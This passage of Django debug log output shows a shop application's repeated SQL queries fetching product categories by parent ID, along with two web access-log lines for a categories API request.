"shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 13:10:19,013 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 13:10:19,016 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 13:10:19,019 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 13:10:19,023 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 13:10:19,026 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 13:10:19,028 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 13:10:19,032 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 13:10:19,035 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 13:10:19,039 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 13:10:19,042 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 13:10:19,045 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 13:10:19,047 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 13:10:19,050 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 13:10:19,054 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 13:10:19,057 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 13:10:19,059 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 13:10:19,062 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 13:10:19,065 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 13:10:19,068 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 13:10:19,072 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 13:10:19,074 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 13:10:19,077 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 13:10:19,080 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 13:10:19,083 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 13:10:19,086 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 13:10:19,089 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 13:10:19,093 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 13:10:19,097 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 13:10:19,100 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 13:10:19,105 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 13:10:19,108 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 13:10:19,112 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 13:10:19,116 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 13:10:19,118 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 13:10:19,121 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 13:10:19,125 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 13:10:19,127 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 13:10:19,132 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 13:10:19,139 utils 4252 140031721535232 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 13:10:19,144 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 13:10:19] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [19/Dec/2019 13:12:32] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-19 13:15:03,617 utils 4252 140031721535232 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 13:15:03,631 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 13:15:03,639 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 13:15:03,644 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 13:15:03,652 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 13:15:03,657 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 13:15:03,660 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 13:15:03,664 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 13:15:03,667 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 13:15:03,674 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 13:15:03,678 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 13:15:03,682 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 13:15:03,684 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 13:15:03,687 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 13:15:03,692 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 13:15:03,694 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 13:15:03,697 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 13:15:03,700 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 13:15:03,703 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 13:15:03,708 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 13:15:03,710 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 13:15:03,713 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 13:15:03,715 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 13:15:03,718 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 13:15:03,721 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 13:15:03,729 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 13:15:03,734 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" 